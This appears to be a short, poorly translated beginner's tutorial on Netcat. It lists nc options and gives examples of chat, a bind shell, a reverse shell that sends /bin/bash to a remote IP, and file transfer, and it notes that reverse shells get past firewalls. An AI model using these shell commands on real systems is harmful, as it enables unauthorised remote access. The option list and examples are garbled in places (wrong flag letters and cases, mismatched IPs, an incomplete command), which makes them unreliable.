NC entry notes

Introduction:

NC (full name Netcat) has the reputation of "Swiss Army Knife" in the network industry. It is small and powerful, and is designed as a stable backdoor tool that can be easily driven directly by other programs and scripts. It is also a powerful network debugging and testing tool that establishes almost all types of network connections you need.

Format:

nc [options...] hostname portnc -l -p port [-s addr] [options...] [hostname] [port]

Main parameters:

-4 IPv4 Mode
-6 IPv6 Mode
-B, -- Bluetooth mode (default: L2CAP protocol)

-E, -- exec = cmd run the command after the connection is established

-L listen for inbound connections

-N: the IP address of the specified number. The hostname cannot be used.

-U udp Mode

-T tcp mode (default mode)

-V detailed output -- use two-V to get more detailed content

-W, -- time = latency after seconds connection is established

-Z scan mode, no data is sent

-T, -- TTL = TTL custom initial TTL

-Z: Turn off the input and output -- used for scanning

-X, -- Transfer file transmission mode

-X, -- rev-transfer reverse File Transfer Mode

-S, -- Address = address local IP Address

Example:

1. Interactive Data Transmission (Simple Chat ):

NC can be used as a simple character chat tool:

[Ephemeral] nc-LP 1234

[Remote] NC 222.24.51.53 1234

2. Forward connection:

Note: Run nc-l-P 1234-t-e/bin/bash on the remote host (IP: 222.24.51.116) to listen to its local port. Once the connection is established, run its/bin/bash command. The local host is connected to the remote host and the connected CMD is redirected to the remote host on port 1234.

[Remote host] nc-l-P 1234-t-e/bin/bash

[Local host] nc-nvv 222.24.51.116 1234

3. Reverse connection:

Note: First enable port 1234 on the local host (with a public IP address) and listen for pending remote host connection; then, redirect the CMD to the host whose IP address is 192.168.1.102 and whose port is 2012.

[Local host] nc-L-VV-P 1234

[Remote host] nc-t-e/bin/bash 222.24.51.53 1234

 

Conclusion: In the above two connection modes, reverse connection is to reverse the shell to the local, because the data requests sent by the remote host are not blocked by the local firewall, so reverse connection is easier.

4. file transmission:

Transfer the ap-wlan0 file from the remote host to local and rename it to the AP-WLAN file:

[Local host] nc-V-l-P 1234>./ap-WLAN

[Remote host] nc-VV 222.24.51.53

 

NC entry notes